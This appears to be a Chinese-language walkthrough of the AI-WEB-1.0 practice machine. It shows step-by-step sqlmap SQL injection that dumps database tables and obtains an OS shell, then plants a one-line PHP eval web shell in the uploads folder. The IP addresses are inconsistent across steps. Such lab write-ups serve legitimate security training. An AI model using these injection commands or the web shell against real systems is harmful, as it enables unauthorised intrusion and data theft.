攻击机kali IP:192.168.48.130
靶机 AI-WEB-1.0 IP:?
信息收集
c段扫描
arp-scan
-l 扫描c段
这里可以分析到靶机IP:192.168.110.138
对靶机进一步扫描
对端口进行扫描
使用nmap -sV -v -T4 对靶机扫描
扫描发现只开放了80端口
对网页进一步扫描
访问没有什么信息
使用dirb 对网页进一步扫描
dirb "http://192.168.110.134/"
尝试发现robots.txt中有内容
访问发现/m3diNf0/不能正常访问
/se3reTdir777/uploads/ 不能访问页面
使用dirb 对/m3diNf0和/se3reTdir777扫描
发现是phpinfo的页面
再扫描se3reTdir777
dirb "http://192.168.110.134/se3reTdir777"
发现新的index.php 访问
发现是查询页面 考虑sql注入
输入’报错发现sql注入漏洞
漏洞利用
sqlmap的使用
这里利用burp抓包得到以下的包
通过抓包得到注入点uid=1&Operation=Submit
使用sqlmap
注入页面为http://192.168.110.134/se3reTdir777/index.php
注入点为uid=1&Operation=Submit
--dbs 列出数据库
sqlmap -u "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -dbs
得到了
aiweb1
information_schema 两个数据库
-D 指定数据库 aiweb1
--tables 列出表名
sqlmap -u "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 --tables
得到 user systemUser 两个表名
再通过-T 指定表名user
--columns 列出字段
sqlmap -u "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user --columns
得到 firstName id lastName 3个字段
再-C 指定字段 id
--dump 获取字段中的数据
sqlmap -u "http://192.168.48.134/se3reTdir777/index.php" -data "uid=1&Operation=Submit" -D aiweb1 -T user -C id --dump
获取shell
sqlmap -u "http://192.168.48.134/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell
选2自定义路径
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
连接成功
上传一句话木马
<?php @eval($_POST['zx'])?>
sqlmap -u "http://192.168.48.134/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write 1.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php